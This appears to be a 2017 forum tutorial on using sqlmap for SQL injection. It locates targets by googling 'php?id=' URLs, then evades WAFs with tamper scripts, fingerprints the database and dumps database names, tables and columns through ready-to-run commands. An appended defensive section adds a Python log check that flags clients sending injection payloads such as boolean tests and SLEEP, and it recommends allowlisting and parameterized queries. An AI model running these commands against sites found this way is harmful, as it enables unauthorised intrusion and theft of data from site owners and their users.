F: sqlmap by LiTeRs50

May 14th, 2017
Hey 'n welcome, today we are going to SQL inject with SQLMAP.
SQL is the language web applications use to talk to their back-end databases.

We are going to split this into 3 sections: finding the target, enumerating the target and dumping the target.

##finding target
We start by finding a URL that we can use in SQLMAP.
A very broad way of finding dynamic links is to google "php?id="
"www.examplefind/product.php?id=200" is an example of the type of URL we want to use.

##enumerating target
Once we have the URL we start enumerating the SQL version and whether it is behind a WAF or not.
If you want a cheat sheet for manual checking you can find it here > http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
But since we are working with a wide range of dynamic links we are going to use a tool: sqlmap.
It's important to check for a WAF before you do anything, so open up a terminal and run
sqlmap -u "www.examplefind/product.php?id=200" --identify-waf
If it finds anything, google the result and get the tamper script for it, passed like --tamper="scripthere"
So far so good
sqlmap -u "www.examplefind/product.php?id=200" --tamper="scripthere" -f
sqlmap is now trying to fingerprint, so when it finishes we hopefully get the SQL version.

For a higher success rate and verbose output you can use this
sqlmap -u "www.examplefind/product.php?id=200" --tamper="scripthere" -f --random-agent --level 5 --risk 3 --time-sec=2 -v3

##dumping target
Let's pretend sqlmap told us the back-end database was 'mysql', and if we were lucky it also gave a vulnerable parameter '<just an example' with string "<just an example" and technique b
Now we just run
sqlmap -u "www.examplefind/product.php?id=200" --tamper="scripthere" --random-agent --level 5 --risk 3 --time-sec=2 -v3 --technique=B --dbms=mysql -p host --string="Reference #9.d2453c17.1494292879.16d5435d" --dbs
We should get all the database names.

To get the tables we replace --dbs with -D <databasename> and --tables
... -v3 --technique=B --dbms=mysql -p host --string="Reference #9.d2453c17.1494292879.16d5435d" -D <databasename> --tables

And finally, to get the columns we do
... -v3 --technique=B --dbms=mysql -p host --string="Reference #9.d2453c17.1494292879.16d5435d" -D <databasename> -T <tablename> --columns --dump
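
Seen from the defending side, as an added example that is not part of the original paste: because --random-agent replaces sqlmap's default User-Agent, a log check for runs like the ones above has to look at the parameter itself rather than the client string. This Python check flags clients that repeatedly send non-integer values for id; the log lines, IP addresses, function names and threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format), not real traffic.
SAMPLE_LOG = '''\
203.0.113.20 - - [14/May/2017:10:00:00 +0000] "GET /product.php?id=200 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.20 - - [14/May/2017:10:00:09 +0000] "GET /product.php?id=201x HTTP/1.1" 200 1204 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [14/May/2017:10:00:01 +0000] "GET /product.php?id=200 HTTP/1.1" 200 5120 "-" "Opera/9.80 (Windows NT 6.1)"
198.51.100.7 - - [14/May/2017:10:00:01 +0000] "GET /product.php?id=200%20AND%204821%3D4821 HTTP/1.1" 200 5120 "-" "Opera/9.80 (Windows NT 6.1)"
198.51.100.7 - - [14/May/2017:10:00:02 +0000] "GET /product.php?id=200%20AND%204821%3D7733 HTTP/1.1" 200 1204 "-" "Opera/9.80 (Windows NT 6.1)"
198.51.100.7 - - [14/May/2017:10:00:02 +0000] "GET /product.php?id=200%27%29%20AND%20SLEEP%282%29--%20x HTTP/1.1" 200 1204 "-" "Opera/9.80 (Windows NT 6.1)"
'''

# client IP and request target from one combined-log line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "[^"]*"$')
INT_RE = re.compile(r"[0-9]+")  # the application only ever issues integer ids


def bad_values_by_source(log_text, param="id"):
    """Map client IP -> URL-decoded values of `param` that are not plain integers."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines in another format instead of guessing
        ip, target = m.groups()
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            if not INT_RE.fullmatch(value):
                hits[ip].append(value)
    return dict(hits)


def suspects(log_text, param="id", threshold=3):
    """IPs with at least `threshold` malformed values; a single typo stays below it."""
    found = bad_values_by_source(log_text, param)
    return sorted(ip for ip, values in found.items() if len(values) >= threshold)


if __name__ == "__main__":
    for ip in suspects(SAMPLE_LOG):
        print(ip, bad_values_by_source(SAMPLE_LOG)[ip])
```

The same allowlist (id must match [0-9]+) belongs in the application as input validation alongside parameterized queries; the log check only tells you who has been probing.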